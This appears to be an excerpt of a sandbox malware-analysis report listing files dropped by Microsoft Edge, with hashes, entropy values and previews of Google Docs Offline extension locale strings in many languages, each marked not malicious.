                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):806
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                              MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                              SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                              SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                              SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):883
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                              MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                              SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                              SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                              SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1031
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                              MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                              SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                              SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                              SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1613
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                              MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                              SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                              SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                              SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):851
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                              MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                              SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                              SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                              SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):848
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                              MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                              SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                              SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                              SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1425
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):961
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):959
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):968
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):838
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1305
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):911
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):939
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):972
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):990
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1658
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1672
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                              MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                              SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                              SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                              SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):935
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                              MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                              SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                              SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                              SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                              Malicious:false
